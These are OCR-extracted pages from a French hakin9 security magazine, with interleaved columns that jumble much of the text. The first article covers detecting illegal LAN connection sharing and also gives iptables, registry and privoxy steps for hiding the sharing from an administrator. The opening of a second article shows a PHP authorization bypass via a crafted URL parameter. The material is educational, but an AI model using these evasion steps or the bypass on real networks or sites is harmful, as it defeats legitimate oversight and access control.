de dissimuler et de protéger le réseau local contre les réseaux externes. dows 2000 est lancé (TTL initial 128),
par contre sur l'ordinateur B le sys-
tème Linux (TTL initial 64), le sniffeur
qui détermine le nombre maximum Cette démarche a pour but d'em-
Tableau 1. Les valeurs TTL
de routeurs IP que ce paquet est pêcher qu'un paquet erre jusqu'à
caractéristiques pour les systèmes
autorisé à traverser avant d'être rejeté l'infini dans une boucle de routage
d'exploitation spécifiques
(cf. la Figure 1). Lors du traitement (c'est-à-dire, un routeur envoie le da-
de l'en-tête du datagramme, chaque tagramme à un autre, et ce dernier le Version du sys- TCP UDP
routeur est obligé de réduire le champ lui renvoie). Si un paquet IP ne peut tème d'exploita- TTL TTL
TTL d'une valeur proportionnelle au être fourni à sa destination, au mo- tion
temps pendant lequel le paquet est ment où le champ TTL atteint la valeur AIX 60 30
gardé. Étant donné que les routeurs zéro, il sera tout simplement supprimé FreeBSD 2.1R 64 65
retiennent les datagrammes pendant du réseau. Les valeurs initiales du
HP/UX 9.0x 30 30
moins d'une seconde, dans la prati- TTL diffèrent en fonction du système
que, vous pouvez vous attendre à ce – le Tableau 1 présente les valeurs HP/UX 10.01 64 64
que chaque routeur sur Internet dé- initiales du champ TTL pour les systè- Irix 5.3 60 60
crémente le champ TTL d’une unité. mes d'exploitation les plus courants. Irix 6.x 60 60
Quand cette valeur atteint le zéro, le La Figure 2 présente le schéma Linux 64 64
datagramme est rejeté et supprimé d'un réseau LAN typique avec la
MacOs/MacTCP 60 60
du réseau, et l'expéditeur reçoit un connexion partagée d'une façon illé-
2.0.x
message d'erreur ICMP. gale. Si l'ordinateur qui donne accès
OS/2 TCP/IP 3.0 64 64
OSF/1 V3.2A 60 30
Solaris 2.x 255 255
SunOS 4.1.3/4.1.4 60 60
MS Windows 95 32 32
MS Windows 98 128 128
MS Windows NT 32 32
3.51
MS Windows NT 128 128
4.0
MS Windows 2000 128 128
Figure 1. Le TTL (Time To Live) dans l'en-tête IP MS Windows XP 128 128

hakin9 N o 3/2005 www.hakin9.org 13

 Figure 2. Un exemple d'un réseau LAN avec un partage de connexion illégal

tcpdump écoutant sur la passerelle dans les paquets ayant la même misation de la valeur TTL sur tous les
Internet est capable d'intercepter adresse IP. Mais cette situation n'a ordinateurs est la seule méthode de
et de démasquer ces paquets. pas toujours lieu – dans un réseau se dissimuler devant l'administrateur.
Cette situation est présentée sur LAN illégal, les utilisateurs peuvent Si c'est Linux avec NAT configuré qui
la Figure 3 – on peut remarquer que utiliser une seule version du système joue le rôle de la passerelle Internet,
les valeurs du champ TTL dans les d'exploitation, par exemple Windows la situation est beaucoup plus facile.
paquets à l'adresse IP 10.10.11.95 2000 ou Linux. Bien que le réseau Il suffit – à l'aide du correctif pour le
qui apparaissent sont non standards soit différencié et plusieurs systè- filtre des paquets iptables portant le
(127 et 63). La deuxième chose mes d'exploitation soient lancés, les nom patch-o-matic – de configurer le
bizarre est le fait qu'un ordinateur personnes malintentionnées peuvent système de façon à ce que chaque
génère les paquets dont les valeurs uniformiser les valeurs TTL sur tous paquet sortant ait une valeur TTL
des champs TTL sont différentes. les ordinateurs indépendamment du unique et déterminée. Dans ce cas,
Cela prouve que l'ordinateur portant type de système (cf. l'Encadré Modi- la personne qui effectue le partage
l'adresse 10.10.11.95 partage la con- fication des valeurs TTL par défaut). de la connexion, ne s'intéresse pas
nexion entre les utilisateurs exploi- Au cas où l'accès à la connexion aux systèmes d'exploitation utili-
tant les systèmes Windows et Linux. se fait à travers un système Windows sés dans le réseau illégal car tous
avec la fonction ICS activée, l'unifor- les paquets après le passage via
Valeurs du TTL par
défaut dans Windows
et Linux
La méthode basée sur la vérification
de la valeur du TTL dans les pa-
quets IP peut s'avérer peu efficace.
C'est parce que dans les systèmes
Windows et Linux, il est possible
de modifier la valeur standard de
la durée de vie des paquets. Si les
utilisateurs de la connexion partagée
Bases

augmentent la valeur du TTL d'une

unité dans leurs systèmes, après le
passage par l'ordinateur-passerelle,
les paquets IP ne seront plus sus-
pects.
L'unique chose qui peut encore
révéler le partage de la connexion
est la valeur du TTL différente Figure 3. Les valeurs du TTL après le passage par un routeur illégal

14 www.hakin9.org hakin9 N o 3/2005

 Partage de connexion illégal

• --ttl-inc valeur – incrémente la

Modification des valeurs TTL par défaut valeur du TTL d'une valeur.

Linux Pour fixer le TTL dans tous les

La modification de la valeur TTL pour une machine locale sous Linux se limite à exé-
paquets transférés par l'ordinateur-
cuter sur la console la commande suivante :
passerelle à 128, il suffit d'ajouter
# echo "X" > /proc/sys/net/ipv4/ip_default_ttl à la table mangle d'iptables la règle de
filtrage suivante :
X étant la nouvelle valeur du TTL. Par défaut, le TTL a la valeur 64 – si Linux veut être
pris pour Windows, il suffit d'entrer comme X la valeur 128 (et mieux encore, 129, si # iptables -t mangle \
vous utilisez la connexion partagée et que vous ne voulez pas éveiller les soupçons de -A FORWARD -j TTL \
l'administrateur du réseau).
--ttl-set 128
Windows 2000/XP
Par défaut, dans les paquets envoyés par le système Windows 2000/XP, la valeur À la suite de l'exécution de cette
TTL est fixée à 128. La façon la plus rapide de vérifier la valeur standard du TTL dans commande, le contenu de la table
le système est de se servir de la commande ping. Il suffit d'envoyer les paquets ICMP doit être identique à celui présenté
echo request à l'interface de la boucle de retour (en anglais loopback) et observer dans le Listing 1.
quelle valeur TTL est configurée dans les réponses ICMP echo reply :
Une autre façon consiste à fixer la
ping 127.0.0.1
valeur appropriée du TTL avant l'exé-
cution du processus de routage sur
Le TTL est modifié dans le registre du système. Cette valeur est stockée dans la ligne l'ordinateur-passerelle, par exemple :
DefaultTTL dans la clé HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
Tcpip\Parameters. S'il n'y en a pas – il faut la créer, par exemple à l'aide du type # iptables -t mangle \
DWORD. -A PREROUTING -i eth0 \

Windows 95/98/Me -j TTL --ttl-set 129

Quant aux systèmes Windows 95/98/Me, la valeur TTL est stockée dans la clé HKEY _
LOCAL _ MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\DefaultTTL . Si Plus de zéro
la valeur DefaultTTL n'est pas présente dans la clé ci-dessus, il faut la créer au moyen L'administrateur peut utiliser la valeur
du type STRING. TTL pour rendre plus difficile le parta-
ge de connexion illégal aux personnes
malintentionnées. Si la machine con-
NAT auront la même valeur dans le Pour appliquer le correctif, vous nectée directement à Internet tourne
champ TTL de l'en-tête IP. aurez besoin des sources du noyau sous Linux, l'administrateur peut fixer,
et d'iptables. Une fois le correctif dans les paquets adressés au réseau
Valeur TTL identique pour appliqué avec succès, il faut instal- local, la valeur TTL à 1. Alors, chaque
les paquets sortants ler le nouveau noyau et le nouveau routeur illégal dans le réseau LAN,
Si l'ordinateur-passerelle tourne sous iptables. Pendant la configuration du après la réception d'un tel paquet et la
Linux avec le service NAT configuré, noyau, il est possible de paramétrer réduction de la valeur TTL d'une unité,
pour fixer le même TTL des paquets de nouvelles options disponibles sera obligé de supprimer ce paquet du
illégaux, vous pouvez exploiter le dans la section Networking Options réseau, ce qui signifie que l'informa-
correctif pour iptables conçu par Ha- -> Netfilter Configuration. Pour la tion ne sera pas transmise plus loin
rald Welte qui ajoute une nouvelle ci- cible TTL, les options suivantes sont et le réseau illégal terminera son fonc-
ble dans les règles de filtrage. Cette disponibles : tionnement (par contre, si le paquet
cible permet à l'utilisateur de fixer la atteint une station finale légale, il sera
valeur TTL pour le paquet IP et de • --ttl-set valeur – fixe la valeur reçu sans problème avec le TTL ayant
l'incrémenter ou décrémenter d'une du TTL à la valeur, la valeur 1). Il faut remarquer que cette
unité donnée. Le correctif est dispo- • --ttl-dec valeur – décrémente la solution est efficace si l'ordinateur
nible à l'adresse http://netfilter.org. valeur du TTL d'une valeur, donnant accès illégal à la connexion,
fonctionne comme routeur et utilise la
Listing 1. Le contenu de la table mangle après la définition de la règle translation d'adresse réseau (NAT).
de filtrage La méthode ci-dessus permet-
tant de décrémenter la valeur du TTL
# iptables -t mangle --list peut être facilement contournée :
Chain FORWARD (policy ACCEPT)
avant le routage, l'administrateur du
target prot opt source destination
TTL all -- anywhere anywhere TTL set to 128
réseau illégal peut incrémenter la va-
leur TTL de chaque paquet arrivant
au routeur. Dans Linux, il suffit de se

hakin9 N o 3/2005 www.hakin9.org 15

 servir de l'objectif iptables (portant le
nom TTL) et saisir dans le tableau
iptables la règle suivante :
# iptables -t mangle \
-A PREROUTING -i wlan0 \
-j TTL --ttl-set 2
Grâce à cela, dans chaque paquet
IP (dont la valeur TTL peut être fixée
même à 1) arrivant à l'interface wlan0
(cf. la Figure 2), la valeur du champ
TTL sera fixée à 2. Le paquet modifié
sera soumis au processus de routa-
ge, sa valeur TTL sera décrémentée
d'une unité et le paquet arrivera sans
problème à l'utilisateur final dans
le réseau LAN illégal. Bien sûr, si
celui-ci a décidé de partager en-
core la connexion, le TTL dans les
paquets sortant du routeur devra
être fixé à une valeur plus élevée.
Proxy pour la première fois
Les méthodes basées sur les manipu-
lations des valeurs TTL sont utiles si
nous avons à faire à des dispositifs de
la troisième couche du modèle ISO/
OSI. Mais il suffit que l'administrateur
du réseau illégal se décide à partager
les périphériques de la quatrième
couche ou supérieure (la passerelle,
c'est-à-dire dans notre cas, différents
intermédiaires réseau, proxy) consti-
tuant le paquet IP entier, et ces mé-
thodes ne seront plus efficaces.
Dans le cas extrême, nous pou-
vons imaginer que dans le réseau illé-
gal, seul le protocole IPX fonctionne,
par contre à la sortie – une passerelle
IPX/IP qui établit les connexions au
nom des clients, et transmet les ré-
ponses arrivant vers le réseau interne
via les paquets IPX. C'est aux stations
terminales qu'elles sont extraites par
le socket approprié qui les transmet
aux applications réseau sous forme
compréhensibles par les protocoles
de la pile TCP/IP. Du point de vue de
Bases
Serveurs proxy
Les serveurs proxy, appelés aussi serveurs mandataires, jouent le rôle d'intermédiaires
entre Internet et les systèmes des réseaux LAN. Son utilisation apporte des avantages
importants – ils permettent d'économiser de l'espace adressable, d'effectuer le filtrage
intelligent et l'authentification au niveau de l'utilisateur, enfin, augmentent la sécurité
(le serveur proxy devient l'unique machine qui a le contact direct avec Internet).
Les utilisateurs qui se connectent à Internet par l'intermédiaire du proxy ont l'im-
pression de se connecter au réseau extérieur alors qu'ils se connectent à une seule
machine. Après l'envoi d'une requête par le client, le serveur proxy vérifie si la con-
nexion est possible à établir. Si oui – il se connecte au nom du client avec un serveur
distant, et ensuite, il sert d'intermédiaire dans la communication.
D'une manière générale, on peut distinguer deux types de ces serveurs :
les serveurs fonctionnant au niveau de l'application et ceux qui servent de pare-feu.
Les proxys applicatifs sont ceux dont la tâche consiste à servir d'intermédiaire dans la
communication entre une (ou plusieurs) applications et un réseau extérieur. Par con-
tre, les serveurs pare-feu ne s'occupent pas du type concret des tâches – ils reçoivent
et transmettent les données sans différencier les protocoles réseau spécifiques.
Une autre division des serveurs proxy est aussi possible : universels (employant
plusieurs protocoles) et spécialisés (ne s'occupant que d'un type du trafic réseau). En
pratique, les serveurs spécialisés sont ceux applicatifs (par exemple, servant d'inter-
médiaire dans le trafic HTTP), et les serveurs universels – ceux de type pare-feu.
Il existe encore un type spécial de proxy permettant de mettre en tampon le trafic
réseau (cache) – cela permet d'augmenter la performance du réseau dans le cas d'une
bande passante de faible débit. De plus, il permet l'enregistrement des événements
(logging) et assure un suivi des connexions (tracking). Ces types de proxy sont appe-
lés intelligents.
Les serveurs pare-feu les plus fréquents pour Windows sont : WinProxy
(http://www.winproxy.com/), WinGate (http://www.wingate.com/) et WinRoute
(http://www.kerio.com). Les utilisateurs de Linux peuvent employer, entre autres, Proxy
(http://proxy.sourceforge.net/), Zaval Proxy Suite (http://www.zaval.org/products/
proxy/) ou SuSE Proxy Suite (http://proxy-suite.suse.de).
si la retransmission des paquets (IP À ce moment, le paquet envoyé par
forwarding) est activée sur l'ordina- exemple à l'adresse 20.20.20.20 sera
teur suspect. Si c'est le cas, nous fourni à l'ordinateur ayant l'adresse
pouvons supposer que nous avons 10.10.11.95 (cf. la Figure 2). Si sur cet
à faire à un utilisateur malhonnête. ordinateur la redirection des paquets
Mais ce n'est pas une preuve. Cha- est activée, celui-ci recevra le paquet
que utilisateur dans le réseau local préparé et le transmettra au proces-
peut posséder dans son ordinateur sus de sélection de trace. Vu qu'il est
deux cartes réseaux configurées qui peu probable que la table de routage
transmettent les paquets entre elles. contienne la ligne se référant au ré-
Néanmoins, cela donne lieu à exami- seau 20.20.20.0/24, le système dé-
ner cet utilisateur de plus près. cide de le transmettre à sa passerelle
Envisageons la situation pré- par défaut. Mais justement, la passe-
sentée sur la Figure 2 : l'adminis- relle par défaut pour cet ordinateur est
trateur dispose d'un ordinateur le routeur connecté directement à In-
tournant sous Linux. L'unique chose ternet (dans notre cas, c'est le routeur
à faire est d'ajouter à notre propre à l'adresse 10.10.11.1). Deux paquets

la transmission IP, le datagramme IP
arrive à la fin à la passerelle, c'est-à-
dire, à l'ordinateur connecté directe-
ment au réseau externe.
Jeu du téléphone
Une autre manière de détecter la
connexion illégale consiste à vérifier
table de routage une ligne fausse
déterminant qu'un paquet IP envoyé
à un certain réseau doit être transféré
à l'adresse IP indiquée que nous
trouvons suspecte :
# route add -net 20.20.20.0/24 \
gw 10.10.11.95 eth0
ICMP echo request apparaissent
dans le réseau : l'un envoyé à partir
de l'ordinateur de l'administrateur
à l'ordinateur suspect, et le second
envoyé par le routeur illégal.
Toute cette expérimentation se
réduit à lancer sur l'ordinateur de
l'administrateur (ou mieux encore,

16 www.hakin9.org hakin9 N o 3/2005


Figure 4. Le champ User-Agent dans l'en-tête HTTP
sur la passerelle à Internet), sur une
console, le sniffeur tcpdump :
# tcpdump -n -i eth0
et sur la deuxième console, à exécu-
ter la commande ping :
# ping 20.20.20.20
Si l'ordinateur portant une adresse IP
donnée fonctionne comme routeur,
deux paquets IMCP echo request
devraient apparaître :
00:59:47:270862 10.10.11.2 §
> 20.20.20.20: icmp: echo request
00:59:47:271276 10.10.11.2 §
> 20.20.20.20: icmp: echo request
On peut aussi tenter de vérifier
quel sous-réseau est utilisé dans
le réseau LAN illégal. Mais pour
ce faire, il est nécessaire d'écrire
un script spécial parce que la véri-
fication manuelle est plutôt vouée
à l'échec. Pour cela, il faut utiliser le
mécanisme décrit ci-dessus, mais il
faut choisir l'adresse du sous-réseau
plus véridique, par exemple :
# route add –net 192.168.1.0/24 \
gw 10.10.11.95 eth0
Si nous ne trouvons pas le sous-ré-
seau approprié, l'effet sera le même
qu'auparavant. Si nous avons réussi
hakin9 N o 3/2005
Partage de connexion illégal
à trouver le sous-réseau, le paquet
sera transféré à l'adresse définie.
Si l'ordinateur portant l'adresse
déterminée est disponible dans le
sous-réseau, il nous répondra par le
paquet ICMP echo reply. Dans le cas
contraire, nous recevrons le message
d'erreur informant que l'hôte donné
est inaccessible (icmp host unrea-
chable). Le mécanisme fonctionnera
jusqu'à ce que l'administrateur du
réseau illégal ne démarre sur le rou-
teur illégal le filtre de paquets de type
Figure 5. Des paquets HTTP suspects
www.hakin9.org
statefull (dynamic) et du filtrage des
connexions établies avec ce réseau
de l'extérieur.
Identification des
navigateurs Web
Chaque navigateur Web lancé dans le
système envoie l'en-tête HTTP dans
la requête demandant le chargement
d'une page adressée au serveur
Web. Cet en-tête contient le champ
User-Agent informant sur le type de
navigateur et la version du système
sur lequel celui-ci est lancé (Figure 4).
Nous pouvons exploiter ce fait pour
détecter le partage de connexion illé-
gal, d'autant plus quand les utilisateurs
illégaux ont différents types et version
des navigateurs tournant sous diffé-
rents systèmes d'exploitation.
Le test détectant la connexion
illégale consiste à analyser les pa-
quets interceptés dans le réseau.
Il faut chercher les paquets qui ont
été envoyés à partir d'une seule
adresse source (passerelle illé-
gale). Si ces paquets contiennent le
champ User-Agent informant que les
versions des navigateurs et des sys-
tèmes d'exploitation sont différentes,
la situation est suspecte.
La situation plus suspecte a lieu
quand le champ User-Agent affiche
17

Figure 6. La modification et l'identification du navigateur Mozilla
Figure 7. La modification de l'identification du navigateur Internet Explorer
Figure 8. L'identification d'IE après les modifications effectuées
différentes versions des systèmes
d'exploitation. Utiliser simultanément
deux systèmes d'exploitation se ser-
vant d'une seule adresse IP est plutôt
impossible (si l'on exclue l'utilisation
des programmes permettant de lancer
les machines virtuelles, comme VMva-
re ou Microsoft Virtual PC), par contre
plusieurs navigateurs dans un sys-
tème – tout à fait possible. La Figure 5
Bases
Figure 9. La détermination de l'adresse IP et du port sur lesquels le serveur
proxy sera disponible
18
présente les paquets qui doivent attirer
l'attention de l'administrateur.
Sur la Figure 5, nous pouvons
remarquer deux requêtes de charge-
ment de la page http://www.onet.pl/,
envoyées à partir d'une seule adresse
10.10.11.95. Grâce à ces requêtes
nous voyons que deux navigateurs
(MSIE 6.0 et Mozilla Firebird) ont été
démarrés sur deux systèmes d'exploi-
www.hakin9.org
tation (Windows 2000 identifié comme
Windows NT 5.0 et Linux). Il faut main-
tenant se poser la question que faire
si l'utilisateur a installé plusieurs sys-
tèmes sur un ordinateur et travaille soit
dans un, soit dans l'autre système.
Proxy pour la deuxième fois
La méthode présentée paraît assez
bonne, mais elle peut être également
contournée, si le champ User-Agent
est supprimé ou modifié de façon
à ce qu'il indique un autre type de na-
vigateur ou de système d'exploitation.
Il est possible de le faire pour chaque
navigateur dans le réseau LAN illégal.
Pour cela, on peut fixer la même iden-
tification dans tous les navigateurs ou
mettre en place le serveur proxy Web
sur la passerelle illégale et contrain-
dre les utilisateurs à l'employer. Si le
serveur proxy est configuré de façon
appropriée, indépendamment des na-
vigateurs utilisés par les utilisateurs, la
requête générée par le serveur proxy
contiendra toujours la même informa-
tion dans le champ User-Agent.
Modification de la valeur
du champ User-Agent
En cas des navigateurs Mozilla (pour
Windows), l'extension User Agent
Switcher ajoutant au programme le
menu qui permet de modifier l'identi-
fication du navigateur, est disponible.
Cette extension implémente la fonc-
tionnalité similaire qu'Identification
du navigateur disponible dans Opera.
Elle permet de configurer la liste des
agents affichés dans le menu et de les
choisir selon les besoins (Figure 6).
En cas des navigateurs Internet
Explorer, il faut modifier la branche
du registre système HKEY _ LOCAL _
MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Internet Settings\
5.0. Il faut y créer la clé User Agent (si
celle-ci n'y est pas). La saisie de la va-
leur par défaut remplacera la chaîne
de caractères Mozilla/4.0. Les autres
paramètres sont modifiables après
l'ajout à la clé User Agent de nouvelles
valeurs de la chaîne portant les noms
Compatible, Version ou Platform avec
les valeurs propres. De plus, vous
pouvez ajouter de nouvelles valeurs
dans la clé Post Platform, comme
hakin9 N o 3/2005

informations supplémentaires pour
le champ User-Agent. Il faut les ajou-
ter comme noms des chaînes sans
valeur, p. ex. information supplémen-
taire = "". Les exemples des modifica-
tions dans le registre sont présentés
sur la Figure 7.
En accédant à la page http://
hitgate.gemius.pl:9170/ua.html, nous
pouvons vérifier comment notre na-
vigateur se présente. Il est aussi pos-
sible d'utiliser cet URL pour vérifier le
champ User-Agent après les modifica-
tions dans le registre. Par exemple,
si quatre premières valeurs du User-
Agent sont modifiées, le navigateur
sera reconnu comme Netscape 6.0
lancé sous Linux (Figure 8).
Utiliser le serveur proxy
pour uniformiser le champ
User-Agent
La façon plus simple de dissimuler
les informations sur les navigateurs
est de se servir du serveur proxy
Web pour le système Linux, comme
par exemple privoxy. Il faut l'installer
sur la passerelle illégale et instruire
les utilisateurs de configurer leurs
navigateurs de manière à ce qu'ils
emploient le serveur proxy. Le pro-
gramme peut être téléchargé à partir
du site http://www.privoxy.org/.
Une fois le programme installé, il
faut effectuer deux modifications dans
les fichiers config et default.action.
Dans le premier fichier, il faut déter-
miner sur quelle interface le serveur
doit écouter les connexions des uti-
lisateurs. Nous devons aussi définir
l'adresse IP et le port affecté à l'inter-
face extérieure, c'est-à-dire celle du
côté du réseau LAN illégal (Figure 9).
Par contre, dans le fichier
default.action, il faut définir le contenu
Figure 10. Les résultats de la détection passive
hakin9 N o 3/2005
Partage de connexion illégal
du champ User-Agent pour toutes
les connexions Web sortantes. Pour
cela, il faut changer la ligne :
-hide-user-agent \
par exemple, contre celle-ci :
+hide-user-agent{Mozilla/4.0 § •
(compatible; MSIE 6.0; § •
Windows NT 5.0; §\
.NET CLR 1.1.4322)} \
Détection passive d'un
système d'exploitation
Encore une autre méthode permet-
tant de détecter les réseaux illégaux
est la détection de différentes ver-
sions des systèmes d'exploitation
utilisant en même temps une seule
adresse IP. L'identification passive
est une méthode dans laquelle
aucun paquet de test n'est envoyé
à la machine cible (cf. l'article de
Michał Wojciechowski OS finger-
printing – comment ne pas se faire
reconnaître, hakin9 4/2004).
La base du fonctionnement de
cette méthode est l'analyse de la
pile TCP/IP de l'ordinateur à partir
des paquets générés par l'ordinateur
en question, après leur interception
à l'aide du sniffing. La notion d'analy-
se de la pile signifie la détermination
du type et de la version du système
d'exploitation à partir des différences
dans les implémentations des piles
TCP/IP utilisés par différents éditeurs
des systèmes d'exploitation. Bien
que les principes de construction
des piles TCP/IP soient exactement
définis dans les documents RFC, les
implémentations des systèmes d'ex-
ploitation spécifiques diffèrent entre
elles. Cela concerne avant tout les
www.hakin9.org
valeurs caractéristiques des champs
fixés dans les en-têtes des proto-
coles IP et TCP. Les programmes
qui effectuent l'analyse passive des
piles TCP/IP, examinent les champs
suivants dans l'en-tête IP :
• la durée de vie du paquet (TTL),
le champ ID (identification),
les paramètres des bits TOS (en
anglais Type Of Service),
• les paramètres du bit ne pas
fragmenter (en anglais don’t frag-
ment).
Par contre, dans l'en-tête TCP, les
champs suivants sont vérifiés :
• la taille de la fenêtre (en anglais
Window Size),
• la taille maximale du segment (en
anglais Maximum Segment Size),
• l'option d'accusé sélectif (en
anglais Selective Acknowledge-
ment),
• l'option NOP (en anglais No Ope-
ration).
L'un des outils destinés au finger-
printing passif est le programme
p0f. Il peut être téléchargé à partir
du site http://lcamtuf.coredump.cx/
p0f.shtml. Dans le système Windows,
pour fonctionner correctement, le
programme exige la bibliothèque
Winpcap installée.
Le programme est capable
d'identifier le système d'exploitation
fonctionnant sur les hôtes à partir
des paquets IP avec les drapeaux
TCP suivants :
• SYN,
• SYN et ACK,
• RST.
À l'aide de l'option --f , le fichier stoc-
kant les signatures pour les systèmes
d'exploitation spécifiques est préparé.
Ensuite, le programme p0f les compa-
re avec les données reconnues dans
le paquet intercepté. Chaque méthode
possède un fichier séparé :
• p0f.fp,
• p0fa.fp,
• p0fr.fp.
19
 Par exemple, la signature pour le
système Windows 2000 avec le
service pack 4 ou XP avec le service
pack 1 se présente ainsi : 65535:128:
1:48:M*,N,N,S:.:Windows:2000 SP4, XP
SP1.Les champs dans l'inscription ci-
dessus signifient respectivement :
• 65535 – la taille de la fenêtre TCP,
• 128 – la durée de vie du paquet
(TTL),
• 1 – le bit ne pas fragmenter posi-
tionné,
• 48 – la taille du paquet,
• M – la taille maximale du segment
(MSS),
• N – l'option non opérationnel
(NOP),
• N – l'option non opérationnel
(NOP),
• S – l'accusé sélectif ACK activé.
L'option -p sert à mettre l'interface
réseau en mode de réception de
tous les paquets (en anglais pro-
miscuous), pas seulement ceux
destinés à l'ordinateur sur lequel
fonctionne p0f. À l'aide de l'option -i
nous pouvons déterminer l'interface
sur laquelle le programme doit écou-
ter. Sur la Figure 10, nous voyons
que le programme p0f a identifié
dans le même temps deux systèmes
utilisant la même adresse IP source.
Cela peut prouver que dans notre
réseau quelqu'un donne accès à la
connexion aux autres utilisateurs.
Dans la version la plus récente de
p0f, l'auteur a introduit l'option sup-
plémentaire -M qui estime (à partir
des anomalies dans les paquets),
en pour-cent, si une masquerade est
possible à l'adresse IP donnée.
Évidemment (le proxy pour la troi-
sième fois...), tout cela a un sens, uni-
quement si l'administrateur du réseau
illégal n'installe pas un proxy de type
pare-feu. Dans ce cas, la prise d'em-
preinte ne concerne que le système
Bases
d'exploitation de l'intermédiaire.
Travail de Sisyphe
Il existe plusieurs méthodes de
détecter le partage de connexion
illégale et de rendre la vie des admi-
nistrateurs de tels réseaux plus dif-
ficile (cf. l'Encadré Autres méthodes
20
Autres méthodes de détection des réseaux illégaux
Messagerie instantanée
En analysant les paquets sortant de la messagerie instantanée, nous pouvons y trou-
ver l'identificateur (le plus souvent le numéro) de l'utilisateur (cf. l'article de Konstantin
Klyagin Paranoïa instantanée du hakin9 3/2004). Étant donné qu'il est quasi impos-
sible qu'un utilisateur lance simultanément sur le même ordinateur plusieurs comptes
d'une messagerie instantanée, si nous interceptons les paquets contenant différents
identificateurs d'utilisateur provenant d'une seule IP, nous pouvons supposer d'avoir
à faire à un réseau illégal.
Traçage du courrier
Vu que la plupart des utilisateurs ne profitent pas des connexions chiffrées avec les
serveurs de messagerie, à la suite de l'analyse des emails à l'aide d'un sniffeur, nous
sommes capables de déduire à partir des certaines en-têtes que nous avons à faire
à un utilisateur illégal. Il n'arrive pas souvent qu'un utilisateur se serve de deux pro-
grammes de messagerie en même temps, et la plupart des clients de messagerie
s'identifient dans les en-têtes User-Agent ou X-Mailer.
Vérification d'uptime
Les paquets TCP peuvent contenir une information additionnelle (optionnelle)
– timestamp, c'est-à-dire le marquer de temps. La valeur de l'incrément de ce mar-
queur dépend du système d'exploitation. Ce marqueur (au cas où nous connaissons
le système d'exploitation), après la multiplication par la fréquence de la mise à jour
du compteur, indique l'uptime de la machine, c'est-à-dire le temps de son dernier
démarrage.
Si, par exemple, au moyen de tcpdump, nous détectons sur l'une IP des paquets
ayant les valeurs de timestamp extrêmement différentes, nous pouvons être sûrs que
nous avons à faire à de machines différentes, c'est-à-dire à des utilisateurs illégaux :
# tcpdump -n | grep timestamp
Voici le fragment des résultats :
<nop,nop,timestamp 3320208223 97006325>
Deux valeurs après le mot timestamp sont respectivement le timestamp de l'hôte source
et la dernière valeur du timestamp reçue à partir de l'hôte cible. Cette méthode est assez
limitée parce que nous admettons que les ordinateurs du réseau illégal envoient les
paquets avec l'option timestamp, ce qui n'est pas toujours le cas.
de détection des réseaux illégaux). donc mieux que les FAI s'occupent
Mais toutes ont un trait commun : de la bande passante et des limites
avec un peu de bonne volonté du transfert, et qu'ils laissent le jeu
et d'invention, elles peuvent être à Big Brother aux programmes TV
contournées et neutralisées. Il serait peu ambitieux. n
Sur le réseau
• http://support.microsoft.com/default.aspx?scid=kb;en-us;158474 – les informations
sur l'emplacement des paramètres réseaux les plus importants dans le registre de
Windows,
• http://www.netfilter.org/patch-o-matic/index.html – la description des corrections
d'iptables,
• http://winpcap.polito.it/install/default.htm – la bibliothèque Winpcap,
• http://lcamtuf.coredump.cx/p0f.shtml – le site du programme p0f,
• http://netfilter.org – le projet Netfilter,
• http://www.0xdecafbad.com/TCP-Timestamping-Obtaining-System-Uptime-
Remotely.html – les informations sur la réception distante d'uptime du système.
www.hakin9.org hakin9 N o 3/2005
 Recherche et exploitation
des bogues dans le code
PHP
Sacha Fuentes

Les programmes et scripts

développés avec PHP, un des
langages de programmation
les plus utilisés, sont souvent
vulnérables à différentes
attaques. Il ne s'agit certes pas
d'un certain manque de sécurité
au niveau du langage lui-même,
mais plutôt de l'inexpérience des
programmeurs qui commettent
souvent des erreurs de
conception.

P
HP est un langage de scripts qui s'exé-
cute côté serveur, doté d'une syntaxe Cet article explique...
issue des langages C, Perl et Java,
permettant la génération dynamique de pages • vous apprendrez à reconnaître les formes les
Web. Des millions de sites à travers le monde plus communes des attaques dites par valida-
entier mettent en œuvre ce langage et de nom- tion d'entrée (en anglais input validation),
• vous saurez reconnaître les erreurs de con-
breux projets écrits en PHP sont consultables
ception les plus répandues dans les scripts
à partir de bases de données libres comme
PHP.
chez SourceForge (http://sourceforge.net).
La simplicité d'utilisation ainsi que le nom-
bre considérable de bibliothèques accessibles
Ce qu'il faut savoir...
à partir de PHP permet à quiconque, connais- • vous devriez connaître idéalement le langage
sant un minimum ce langage, d'écrire et d'éditer PHP.
des applications complexes. Dans de nombreux
cas, ces applications ne sont malheureusement
pas toujours bien conçues et ne fournissent pas
la sécurité nécessaire pour un site grand public. À propos de l'auteur
Sacha Fuentes travaille dans le secteur des Tech-
À la lumière de ce phénomène, nous allons
nologies de l'Information depuis ces sept dernières
évoquer les erreurs de sécurité parmi les plus
Bases

années, et possède à son actif une large palette de

répandues sous PHP ; nous verrons comment
repérer ces bogues qui permettent l'accès au
code et la manière de les exploiter.
Les données d'entrée
utilisateur non contrôlées
Le principal problème de sécurité sous PHP est
le manque de contrôles sur les données d'entrée
compétences – de la programmation à l'exploitation
des systèmes (y compris l'assistance aux utilisa-
teurs). Il s'intéresse à l'ensemble des domaines
touchant à la sécurité, mais consacre actuellement
la majeure partie de son temps à la sécurité des
applications Web ainsi qu'à la formation des utili-
sateurs finaux.

22 www.hakin9.org hakin9 N o 3/2005

 Bogues sous PHP

utilisateur. Il nous faut donc connaî-

tre la provenance potentielle de ces Listing 1. Exemple d'un script PHP peu sûr
dernières. Il existe quatre types de <?php
variables pouvant être envoyées au if (authenticated_user()) {
serveur : les variables GET/POST, les $authorized = true;
cookies et les fichiers. Considérons }
if ($authorized) {
un exemple avec les variables GET.
include "/highly/sensitive/data.php";
Une requête telle que http:// }
example.com/index.php?var=MYIN- ?>
PUT, dont index.php serait :

<?php
Listing 2. Corps d'une page principale wiki
echo $var;
?> function QWTIndexFormatBody()
{
// Output the body
produira en sortie l'élément suivant :
global $QW;
return QWFormatQwikiFile( $QW['pagePath'] );
MYINPUT }

Voilà une méthode très pratique,

mais qui présente également très
peu de sécurité. Puisque l'utilisateur
peut définir et affecter des variables
arbitraires, le programmeur doit
donc rester extrêmement vigilant en
matière d'affectation des valeurs par
défaut aux variables. Examinons un
exemple tiré du manuel d'utilisation
de PHP (voir le Listing 1).
Il est possible de modifier la va-
riable $authorized afin d'obtenir un
accès aux données dites sensibles
au moyen de la requête suivante :
http://example.com/auth.php?autho-
rized=1
Il existe un autre exemple de pro-
